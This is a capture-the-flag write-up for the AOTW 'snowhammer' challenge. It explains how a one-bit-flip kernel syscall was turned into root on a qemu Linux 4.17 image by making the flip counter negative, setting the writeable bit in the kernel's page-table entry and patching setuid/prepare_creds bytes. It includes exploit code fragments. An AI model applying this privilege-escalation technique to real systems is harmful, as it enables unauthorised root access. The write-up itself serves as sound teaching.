The Challenge

This was the third in a series of challenges for the final day of AOTW. The challenge consists of a Linux kernel and userland running in qemu. On boot we get the following message and are dropped into an unprivileged shell:


███████╗███╗   ██╗ ██████╗ ██╗    ██╗ ██╗  ██╗ █████╗ ███╗   ███╗███╗   ███╗███████╗██████╗ 
██╔════╝████╗  ██║██╔═══██╗██║    ██║ ██║  ██║██╔══██╗████╗ ████║████╗ ████║██╔════╝██╔══██╗
███████╗██╔██╗ ██║██║   ██║██║ █╗ ██║ ███████║███████║██╔████╔██║██╔████╔██║█████╗  ██████╔╝
╚════██║██║╚██╗██║██║   ██║██║███╗██║ ██╔══██║██╔══██║██║╚██╔╝██║██║╚██╔╝██║██╔══╝  ██╔══██╗
███████║██║ ╚████║╚██████╔╝╚███╔███╔╝ ██║  ██║██║  ██║██║ ╚═╝ ██║██║ ╚═╝ ██║███████╗██║  ██║
╚══════╝╚═╝  ╚═══╝ ╚═════╝  ╚══╝╚══╝  ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
                                                                                               
════════════════════════════════════════════════════════════════════════════════════════════╗
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/syscalls.h>random: fast init done


#define MAXFLIP 1

#ifndef __NR_SNOWHAMMER
#define SNOWHAMMER 333
#endif

long flip_count = 0;
EXPORT_SYMBOL(flip_count);

SYSCALL_DEFINE2(snowhammer, long *, addr, long, bit)
{
        if (flip_count >= MAXFLIP)
        {
                printk(KERN_INFO "snowhammer: sorry :/\n");
                return -EPERM;
        }

        *addr ^= (1ULL << (bit));
        flip_count++;

        return 0;
}
════════════════════════════════════════════════════════════════════════════════════════════╝
/ $

Just like the challenge’s namesake, we basically get to flip a bit in kernel memory, with the restriction that we can flip only one bit and it has to be in writeable memory.

Recon

The first thing I like to do when approaching a kernel exploitation challenge is to gather as much information about the kernel as possible. When we get a local qemu instance, that usually means patching the initrd to give us a root shell to look around with. Here, b0bb was nice to us and left us /proc/kallsyms so I extracted that.
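For anyone who would rather script the symbol lookup than grep for it, here is a minimal sketch. It assumes the usual "address type name" line format of /proc/kallsyms; kallsyms_match and kallsyms_lookup are hypothetical helper names of mine and were not part of the original exploit.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms line of the form "<hex addr> <type> <name>".
 * Returns 1 and stores the address if the line names `wanted`, else 0. */
int kallsyms_match(const char *line, const char *wanted,
                   unsigned long *addr_out)
{
	unsigned long addr;
	char type;
	char name[256];

	assert(line && wanted && addr_out);
	if (sscanf(line, "%lx %c %255s", &addr, &type, name) != 3)
		return 0;
	if (strcmp(name, wanted) != 0)
		return 0;
	*addr_out = addr;
	return 1;
}

/* Scan a kallsyms-style file for `wanted`; returns 0 if it is not found
 * or the file cannot be opened. */
unsigned long kallsyms_lookup(const char *path, const char *wanted)
{
	char line[512];
	unsigned long addr = 0;
	FILE *f = fopen(path, "r");

	if (!f)
		return 0;
	while (fgets(line, sizeof line, f))
		if (kallsyms_match(line, wanted, &addr))
			break;
	fclose(f);
	return addr;
}
```

Calling kallsyms_lookup("/proc/kallsyms", "flip_count") on the target should then yield the address of the counter, provided the symbol is listed and the addresses are not hidden from the calling user.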

Some interesting observations for later on:

  • We’re running Linux version 4.17.0
  • kaslr is off
  • /home/snowhammer is the only writeable location as the unprivileged user.
  • we have glibc, a pretty full busybox including base64 and gzip.

The next thing we can do to prepare is to unpack a useable linux kernel ELF using the appropriate extract-vmlinux script.

Dead ends and new beginnings

My first idea was to follow the rough plan of the Project Zero rowhammer exploit (exploit code): mmap a large area in userspace, then flip a bit in the page table entry for the mmapped region to shift its physical address so that the region contains its own page table entry. We can then overwrite the page table entry to point to arbitrary kernel memory and patch a rootkit into the kernel.

After playing around with /proc/self/pagemap, though, it became clear that this would be difficult because:

  • /proc/<pid>/pagemap is not readable as an unprivileged user, so we will have difficulties reliably predicting the physical address of the region (it shifts around depending on e.g. size of the exploit code etc.)
  • we don’t have a reliable way of predicting the page table entry for the region
  • we are flipping bits in virtual memory address space anyways ¯\_(ツ)_/¯

So this seemed like a dead end. And what do you do when you hit a dead end? Right, recycle old exploits! That’s greener, better for the environment, just like hxp’s Green Computing challenge. However, to implement that attack, we need to be able to overwrite arbitrary kernel memory, and flipping one bit doesn’t seem to get us that far, right?

Really, just one bit?

One oddity of the vulnerable patch that m noticed is that flip_count is a signed long, which means that if we flip bit 63 of it, it becomes negative and we can flip many more (>9000) bits:

puts("[+] flipping off the flip_count\n");
long *flip_count = (long *) 0xffffffff818f6f78;
assert(syscall(333, flip_count, 63) == 0);

flipping off the flip_count
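To see why the sign flip works, here is a small userspace model of the syscall's control flow. It is only a sketch: model_flip_count and model_snowhammer are stand-ins I made up for the kernel's flip_count and the real syscall, and -1 takes the place of -EPERM.

```c
#include <assert.h>
#include <limits.h>

#define MAXFLIP 1

/* Userspace stand-in for the kernel's global counter. */
long model_flip_count = 0;

/* Same checks and ordering as the snowhammer syscall, minus printk.
 * Returns -1 where the kernel would return -EPERM. */
long model_snowhammer(long *addr, long bit)
{
	unsigned long *p = (unsigned long *)addr;

	assert(bit >= 0 && bit < 64);
	if (model_flip_count >= MAXFLIP)
		return -1;
	*p ^= 1UL << bit;       /* flip the requested bit */
	model_flip_count++;     /* counted after the flip, as in the kernel */
	return 0;
}
```

Pointing the very first call at the counter itself with bit 63 leaves it at LONG_MIN + 1, so the signed comparison against MAXFLIP keeps passing for any realistic number of further flips.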

We now just have to make sure to run this exploit only once per boot; a second run flips bit 63 back, flip_count becomes positive again and we lock ourselves out (which happened to me way too many times - I should really have left a marker file on the file system for this…).
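A marker file guard could look roughly like the sketch below. It assumes the root file system is rebuilt from the initrd on every boot, so a marker created in the writeable home directory disappears on reboot; first_run_since_boot and the marker path are hypothetical names and were not in my exploit.

```c
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>

/* Returns 1 if the marker was created just now (first run), 0 if it
 * already existed, and -1 on any other error. O_CREAT | O_EXCL makes the
 * check-and-create step atomic. */
int first_run_since_boot(const char *marker_path)
{
	int fd;

	assert(marker_path != NULL);
	fd = open(marker_path, O_WRONLY | O_CREAT | O_EXCL, 0600);
	if (fd >= 0) {
		close(fd);
		return 1;
	}
	return errno == EEXIST ? 0 : -1;
}
```

The exploit would call something like first_run_since_boot("/home/snowhammer/.flipped") before touching flip_count and skip the bit 63 flip when it returns 0.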

The patch

While re-using the patch from Green Computing, I noticed a bit of a flaw in my Green Computing rootkit. It worked there because patching happened before init was called, so just breaking the initial setuid syscall that gave us a restricted shell was sufficient. Here we also need to patch the prepare_creds to become a prepare_kernel_cred! Adjusting the offsets gives us two 2-byte patches:

// 0xffffffff8102b734: 0f 84 --> eb 4d - patch the jump
// 0xffffffff8102b723: 31 7d --> 2f 7f - prepare_creds -> prepare_kernel_cred

We can write a small 16-bit patch routine that flips the correct bits:

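/* Turn the 16-bit value `old` at patch_target into `new`, one bit flip at a time. */
void patch16(long *patch_target, unsigned short old, unsigned short new) {
	unsigned short diff = old ^ new;	/* set bits mark the positions that differ */
	for (int bit = 0; bit < 16; bit++) {
		if (diff & (1<<bit))
			assert(syscall(333, patch_target, bit) == 0);
	}
}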

And patch dat kernel!

puts("[+] patching the patches\n");
patch16((long*) 0xffffffff8102b734, 0x840f, 0x4deb);
patch16((long*) 0xffffffff8102b723, 0x7d31, 0x7f2c);
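The XOR logic is easy to sanity-check in userspace before risking a kernel panic. The sketch below applies the same flips to a local byte buffer instead of issuing syscalls; patch16_model is a hypothetical name, and it assumes a little-endian host like the x86_64 target.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Apply the bit flips patch16 would request, but to a local buffer.
 * Returns the number of single-bit flips that were needed. */
int patch16_model(uint8_t *target, uint16_t old, uint16_t new_val)
{
	uint16_t cur;
	uint16_t diff = (uint16_t)(old ^ new_val);
	int flips = 0;

	memcpy(&cur, target, sizeof cur);   /* little-endian load, as on x86_64 */
	assert(cur == old);                 /* refuse to patch unexpected bytes */
	for (int bit = 0; bit < 16; bit++) {
		if (diff & (1u << bit)) {
			cur ^= (uint16_t)(1u << bit);
			flips++;
		}
	}
	memcpy(target, &cur, sizeof cur);
	return flips;
}
```

Feeding it the bytes 0f 84 with old 0x840f and new 0x4deb should leave eb 4d in the buffer, which is the jump patch from the comment.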

But the kernel .text can’t possibly be writeable …?

The Green Computing exploit relies on patching the sys_setuid handler, which resides in non-writeable kernel memory. When we attempt to patch anything in there, we get a horrible kernel panic:

BUG: unable to handle kernel paging request at ffffffff8102b734
PGD 1816067 P4D 1816067 PUD 1817063 PMD 10001e1
Oops: 0003 [#1] NOPTI
CPU: 0 PID: 45 Comm: pwn Not tainted 4.17.0 #1
RIP: 0010:__x64_sys_snowhammer+0x2b/0x38
RSP: 0018:ffffc9000007ff38 EFLAGS: 00000202
RAX: 0000000000000002 RBX: ffffc9000007ff58 RCX: 0000000000000001
RDX: ffffffff8102b734 RSI: ffffc9000007ff58 RDI: ffffc9000007ff58
RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  00007fbb83fd84c0(0000) GS:ffffffff8182a000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffff8102b734 CR3: 00000000075f0000 CR4: 00000000000006b0
Call Trace:
 ? do_syscall_64+0x7b/0x89
 ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
 ? __sys_setuid+0x29/0xb9
Code: 48 83 3d bc a4 84 00 00 48 8b 4f 68 48 8b 57 70 7e 11 48 c7 c7 c6 6f 66 81 e8 d4 23 f9 ff 48 83
c8 ff c3 b8 01 00 00 00 48 d3 e0 <48> 31 02 31 c0 48 ff 05 8d a4 84 00 c3 ff 07 c3 8b 17 31 c0 85
RIP: __x64_sys_snowhammer+0x2b/0x38 RSP: ffffc9000007ff38
CR2: ffffffff8102b734
---[ end trace 6ae088dc1b6d625d ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
---[ end Kernel panic - not syncing: Fatal exception ]---

To make the kernel writeable, we need to … flip a bit, which we can do with our syscall. That bit is the writeable bit of the page table entry that maps the kernel. So let me take you on a trip through the magical land of x86_64 page tables…

We start our journey by patching the run.sh script to give us a qemu monitor. I personally use -monitor tcp::5555,server,nowait, but whatever floats your goat is also fine.

Once we attach to the qemu monitor port, we grab a complete memory dump as well as the value of the CR3 register which points to the top-level page table directory:

(qemu) pmemsave 0 0x8000000 memdump
(qemu) info registers
[...]
CR0=80050033 CR2=0000000002654060 CR3=00000000075de000 CR4=000006b0
[...]

The virtual addresses we want to resolve in sys_setuid are 0xFFFFFFFF8102B734 and 0xFFFFFFFF8102B723, which both fall in the same 4 KiB page at 0xFFFFFFFF8102B000.

Splitting this up, we find the indices into the page directories and page tables:

        0b 1111111111111111 111111111 111111110 000001000 000101011 000000000000
           \______  ______/ \___  __/ \___  __/ \___  __/ \___  __/ \____  ____/
                  \/            \/        \/        \/        \/         \/
length          16 bit        9 bit     9 bit     9 bit     9 bit      12 bit
idx into    sign extension     PML4      PML3   Page Dir  Page Table   offset

value                          511       510         8        43
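The same split can be done with a few shifts and masks. This is a minimal sketch for standard 4-level x86_64 paging; pt_index and page_offset are hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

/* Index into the paging structure at `level` for a 4-level x86_64 walk:
 * level 3 = PML4, 2 = PML3, 1 = page directory, 0 = page table.
 * Each level consumes 9 bits above the 12-bit page offset. */
unsigned pt_index(uint64_t vaddr, int level)
{
	assert(level >= 0 && level <= 3);
	return (unsigned)((vaddr >> (12 + 9 * level)) & 0x1ff);
}

/* Byte offset inside a 4 KiB page. */
unsigned page_offset(uint64_t vaddr)
{
	return (unsigned)(vaddr & 0xfff);
}
```

For 0xFFFFFFFF8102B734 this gives the indices 511, 510, 8 and 43 from the diagram, plus the in-page offset 0x734.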

We dump the PML4 at the address specified in CR3:

xxd -e -g8 -c8 -a -s 0x75de000 -l 0x1000 memdump
075de000: 0000000002379067  g.7.....
075de008: 0000000000000000  ........
*
075de7f8: 00000000075db067  g.].....
075de800: 0000000000000000  ........
*
075de880: 00000000018fa067  g.......
075de888: 0000000000000000  ........
*
075dec90: 000000000008a067  g.......
075dec98: 0000000000000000  ........
*
075deea0: 000000000636c067  g.6.....
075deea8: 0000000000000000  ........
*
075defe0: 0000000006b6b067  g.......
075defe8: 0000000000000000  ........
075deff0: 0000000000000000  ........
075deff8: 0000000001816067  g`......

The entry at index 511 (offset 0xff8) is 0x1816067, which indicates that the next page directory can be found at physical address 0x1816000:

xxd -e -g8 -c8 -a -s 0x1816000 -l 0x1000 memdump
01816000: 0000000000000000  ........
*
01816ff0: 0000000001817063  cp......
01816ff8: 0000000001818067  g.......
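Each step of the walk does the same two things: read the 8-byte entry at table base + 8 * index, then mask off the flag bits to get the next table's physical address. A rough sketch of that, assuming the dump was saved starting at physical address 0 (so file offset equals physical address) and a little-endian host; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* File offset of entry `index` in the table at physical address table_phys. */
uint64_t entry_file_offset(uint64_t table_phys, unsigned index)
{
	assert(index < 512);
	return table_phys + 8ull * index;
}

/* Physical address stored in an entry: bits 12..51, flags stripped. */
uint64_t entry_next_table(uint64_t entry)
{
	return entry & 0x000ffffffffff000ull;
}

/* Read one entry from a memory dump; returns 0 on success, -1 on error. */
int read_entry(FILE *dump, uint64_t table_phys, unsigned index, uint64_t *out)
{
	if (fseek(dump, (long)entry_file_offset(table_phys, index), SEEK_SET) != 0)
		return -1;
	return fread(out, sizeof *out, 1, dump) == 1 ? 0 : -1;
}
```

With the values from the dumps, index 511 of the table at 0x75de000 sits at file offset 0x75deff8, and its entry 0x1816067 points at 0x1816000.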

The entry at index 510 (offset 0xff0) is 0x1817063, meaning we look at 0x1817000 next:

xxd -e -g8 -c8 -a -s 0x1817000 -l 0x1000 memdump
01817000: 0000000000000000  ........
*
01817040: 00000000010001e1  ........
01817048: 00000000012001e1  .. .....
01817050: 000000000227e163  c.'.....
01817058: 80000000016001e1  ..`.....
01817060: 000000000227d063  c.'.....
01817068: 0000000000000000  ........
*
01817ff8: 0000000000000000  ........

The entry at index 8 (offset 0x40) here is interesting: 0x0000000001000000 is the physical address of the kernel, and the low byte of the flags, 0xe1, reduces to:

0x1817040: 0b11100001
               \   \\\_ present
                \   \\_ not writeable
                 \   \_ not user accessible
                  \____ 2 MiB page (not an index into page table)
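The flag decoding can be written down as a handful of bit masks. The bit positions are the standard x86_64 ones; the macro and function names are my own shorthand for this sketch.

```c
#include <assert.h>
#include <stdint.h>

#define PTE_PRESENT  (1ull << 0)
#define PTE_WRITABLE (1ull << 1)
#define PTE_USER     (1ull << 2)
#define PTE_ACCESSED (1ull << 5)
#define PTE_DIRTY    (1ull << 6)
#define PTE_HUGE     (1ull << 7)   /* PS: entry maps a large page directly */
#define PTE_GLOBAL   (1ull << 8)
#define PTE_NX       (1ull << 63)

/* Returns 1 if `flag` is set in the entry, 0 otherwise. */
int entry_has(uint64_t entry, uint64_t flag)
{
	return (entry & flag) != 0;
}

/* The entry as it would look after one snowhammer flip of `bit`. */
uint64_t entry_flip(uint64_t entry, int bit)
{
	assert(bit >= 0 && bit < 64);
	return entry ^ (1ull << bit);
}
```

Applied to 0x10001e1, entry_has reports present and huge but neither writable nor user; entry_flip(0x10001e1, 1) yields 0x10001e3, the same entry with the writeable bit set.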

Since the kernel is mapped by a 2 MiB page, we can stop descending the page tables here. We look up the virtual address at which this page table itself is mapped using info tlb, and just flip the writeable bit of the entry:

// 0xffffffff81817000: 0000000001817000 XG-DA---W
printf("[+] writing writeable\n");
assert(syscall(333, 0xffffffff81817040, 1) == 0);
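The address passed to the syscall is just the virtual alias of the entry's physical location. The info tlb line suggests a fixed offset between the two; the sketch below assumes that offset is 0xffffffff80000000 (the usual x86_64 kernel mapping base with kaslr off), which matches this dump but is an assumption rather than something I verified in general. The names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed base of the kernel image mapping with kaslr off. */
#define KERNEL_MAP_BASE 0xffffffff80000000ull

/* Virtual alias of a physical address inside the kernel image mapping. */
uint64_t kernel_map_virt(uint64_t phys)
{
	assert(phys < 0x80000000ull);   /* stay inside the top 2 GiB window */
	return KERNEL_MAP_BASE + phys;
}

/* Virtual address of entry `index` in the table at table_phys. */
uint64_t table_entry_virt(uint64_t table_phys, unsigned index)
{
	assert(index < 512);
	return kernel_map_virt(table_phys) + 8ull * index;
}
```

table_entry_virt(0x1817000, 8) comes out as 0xffffffff81817040, the address used in the flip.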

The grand finale

We can now trigger sys_setuid to get a shell:

puts("[+] syscalling the syscall\n");
syscall(__NR_setuid, 0);

puts("[+] shelling a shell\n");
system("/bin/sh");

~ $ ./pwn
[+] flipping off the flip_count
[+] writing writeable
[+] patching the patches
[+] syscalling the syscall
[+] shelling a shell
/home/snowhammer # id
uid=0(root) gid=0(root) groups=0(root)
/home/snowhammer # cd /root
~ # cat flag
AOTW{tH1s_gUy_ChRisTm4sSes}

Thanks to b0bb for this fun finale to the OverTheWire Advent Bonanza!

– plonk